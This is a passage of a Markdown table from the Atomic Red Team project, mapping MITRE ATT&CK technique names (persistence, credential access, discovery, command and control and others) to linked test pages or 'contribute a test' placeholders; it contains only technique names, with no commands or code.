| | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Process Discovery](../../T1057/T1057.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Encrypted Channel](../../T1573/T1573.md) | |
| | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Process Injection](../../T1055/T1055.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Software Deployment Tools](../../T1072/T1072.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hide Artifacts](../../T1564/T1564.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
| | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Escape to Host](../../T1611/T1611.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Cloud Service Discovery](../../T1526/T1526.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Inter-Process Communication](../../T1559/T1559.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Software Discovery](../../T1518/T1518.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Steal Application Access Token](../../T1528/T1528.md) | [System Time Discovery](../../T1124/T1124.md) | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Indirect Command Execution](../../T1202/T1202.md) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | | | | | |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Impair Defenses](../../T1562/T1562.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | | |
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | [Forced Authentication](../../T1187/T1187.md) | | | | | | |
| | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | |
| | | Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
| | | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
| | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
| | | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
| | | Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes List Secrets](../../T1552.007/T1552.007.md) | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
| | | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
| | | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
